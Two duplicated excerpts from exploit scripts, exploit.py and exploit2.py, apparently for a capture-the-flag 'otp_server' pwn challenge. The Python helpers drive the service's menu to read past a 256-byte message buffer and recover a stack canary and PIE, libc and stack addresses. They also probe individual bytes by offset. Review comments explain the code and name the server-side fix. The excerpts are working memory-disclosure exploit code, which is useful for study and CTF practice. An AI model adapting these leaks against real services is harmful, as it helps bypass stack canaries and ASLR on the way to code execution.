pwnables/otp_server/exploit.py [32:78]:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def set_key(value):
  """Select menu entry 1 and submit `value` as the key.

  Talks to the service through `p`, the connection object created
  elsewhere in this script. Waits for the ">>> " menu prompt and then
  for the "Enter key:" prompt before sending; `value` goes out via
  sendline, i.e. with a line terminator appended.
  """
  menu_choice = "1"
  key_prompt = "Enter key:\n"

  p.readuntil(">>> ")
  p.sendline(menu_choice)
  p.readuntil(key_prompt)
  p.sendline(value)


def encrypt_message(message):
  """Select menu entry 2 and submit a fixed 256-byte message.

  NOTE(review): `message` is accepted but never read. The payload is
  always 'Q' * 256, whatever the caller passes, and it is sent with
  send (no line terminator). Behaviour is kept as found; confirm
  whether ignoring the argument is intentional.
  """
  menu_choice = "2"
  fixed_payload = 'Q'*256

  p.readuntil(">>> ")
  p.sendline(menu_choice)
  p.readuntil("Enter message to encrypt:\n")
  p.send(fixed_payload)


def leak_stack():
  """Request one encryption and unpack four 8-byte values from the reply.

  Sets a 256-byte key, requests an encryption, then reads everything
  between the BEGIN and END marker lines (the END marker is included in
  the returned buffer). The values are taken from fixed indexes past
  256, so the script expects the reply to carry more than the 256-byte
  message.
  NOTE(review): that presumably means the service prints past the end
  of its message buffer; confirm against the server source. Bounding
  the output to the message length on the service side would close it.

  Returns (stack, canary, libc_leak, pie_leak, stack_leak). Note the
  return order differs from the order of the slices in the buffer.
  The canary/pie/libc/stack labels are the author's; nothing in this
  excerpt verifies them.
  """
  set_key("Q"*256)
  encrypt_message("A"*256)

  begin_marker = "----- BEGIN ROP ENCRYPTED MESSAGE -----\n"
  end_marker = "----- END ROP ENCRYPTED MESSAGE -----\n"
  p.readuntil(begin_marker)
  stack = p.readuntil(end_marker)

  def qword_at(start):
    # 8-byte slice beginning at `start`, unpacked with u64.
    return u64(stack[start:start + 8])

  canary = qword_at(264)
  pie_leak = qword_at(272)
  libc_leak = qword_at(280)
  # Indexes 288..295 are skipped by the original script as well.
  stack_leak = qword_at(296)

  return stack, canary, libc_leak, pie_leak, stack_leak


def leak_offset_byte(offset):
  """Return the byte at index 263 + offset of a fresh service reply.

  Every call performs a full round trip: it resets the key to
  'Q' * 256, requests an encryption, and reads the text between the
  BEGIN and END marker lines.

  NOTE(review): u8 is handed the result of indexing the reply. That is
  a one-character str on Python 2 but an int on Python 3; confirm which
  interpreter this script targets.
  """
  set_key("Q"*256)
  encrypt_message("A"*256)

  begin_marker = "----- BEGIN ROP ENCRYPTED MESSAGE -----\n"
  end_marker = "----- END ROP ENCRYPTED MESSAGE -----\n"
  p.readuntil(begin_marker)
  reply = p.readuntil(end_marker)

  index = 263 + offset
  return u8(reply[index])


def write_offset(offset):
  """Submit a key of `offset` 'B' bytes plus a NUL, then read a byte back.

  After setting that key and requesting one encryption, the byte at the
  same offset is read back with leak_offset_byte.

  NOTE(review): leak_offset_byte is called twice, once for the printed
  value and once for the return value. Each call resets the key and
  triggers another encryption, so the returned byte comes from a later
  round trip than the printed one. Kept as found; confirm that the
  double read is intended.
  """
  key = "B" * (offset) + "\x00"
  set_key(key)
  encrypt_message("A"*256)

  first_read = leak_offset_byte(offset)
  print("written byte: " + hex(first_read))

  return leak_offset_byte(offset)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -



pwnables/otp_server/exploit2.py [32:78]:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def set_key(value):
  """Pick option 1 from the menu and send `value` as the key.

  Uses `p`, the connection object defined elsewhere in this script.
  Both prompts (">>> " and "Enter key:") are awaited before writing;
  sendline appends a line terminator to `value`.
  """
  option = "1"
  prompt = "Enter key:\n"

  p.readuntil(">>> ")
  p.sendline(option)
  p.readuntil(prompt)
  p.sendline(value)


def encrypt_message(message):
  """Pick option 2 from the menu and send a fixed 256-byte message.

  NOTE(review): the `message` argument is unused. 'Q' * 256 is always
  what goes on the wire, sent with send (no line terminator). Kept as
  found; confirm whether the argument was meant to be sent instead.
  """
  option = "2"
  payload = 'Q'*256

  p.readuntil(">>> ")
  p.sendline(option)
  p.readuntil("Enter message to encrypt:\n")
  p.send(payload)


def leak_stack():
  """Trigger one encryption and decode four 8-byte fields of the reply.

  The reply is everything from just after the BEGIN marker line up to
  and including the END marker line. All four fields sit at indexes
  beyond 256, i.e. past the length of the message that was submitted.
  NOTE(review): this presumably relies on the service emitting bytes
  beyond its message buffer; confirm against the server source. A
  length-bounded write on the service side would remove the exposure.

  Returns (stack, canary, libc_leak, pie_leak, stack_leak); libc_leak
  precedes pie_leak in the tuple although it follows it in the buffer.
  The field names are the author's and are not checked here.
  """
  set_key("Q"*256)
  encrypt_message("A"*256)

  p.readuntil("----- BEGIN ROP ENCRYPTED MESSAGE -----\n")
  stack = p.readuntil("----- END ROP ENCRYPTED MESSAGE -----\n")

  field_width = 8

  def field(start):
    # One u64-decoded field starting at index `start`.
    return u64(stack[start:start + field_width])

  canary = field(264)
  pie_leak = field(272)
  libc_leak = field(280)
  # The original script does not read indexes 288..295 either.
  stack_leak = field(296)

  return stack, canary, libc_leak, pie_leak, stack_leak


def leak_offset_byte(offset):
  """Fetch a new reply and return its byte at index 263 + offset.

  Each call resets the key to 'Q' * 256 and requests another
  encryption before reading the text between the marker lines, so it
  is not a passive read.

  NOTE(review): passing an indexed element to u8 works with Python 2
  str (one-character string); Python 3 bytes indexing returns an int.
  Confirm the intended interpreter.
  """
  set_key("Q"*256)
  encrypt_message("A"*256)

  p.readuntil("----- BEGIN ROP ENCRYPTED MESSAGE -----\n")
  reply = p.readuntil("----- END ROP ENCRYPTED MESSAGE -----\n")

  position = 263 + offset
  value = u8(reply[position])
  return value


def write_offset(offset):
  """Send a key of `offset` 'B' bytes followed by NUL, then read back.

  One encryption is requested with that key, after which the byte at
  `offset` is read back through leak_offset_byte.

  NOTE(review): the read-back happens twice (once printed, once
  returned). Each read resets the key and encrypts again, so the two
  values come from different round trips. Kept as found; confirm the
  second round trip is wanted.
  """
  terminated_key = "B" * (offset) + "\x00"
  set_key(terminated_key)
  encrypt_message("A"*256)

  observed = leak_offset_byte(offset)
  print("written byte: " + hex(observed))

  return leak_offset_byte(offset)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -



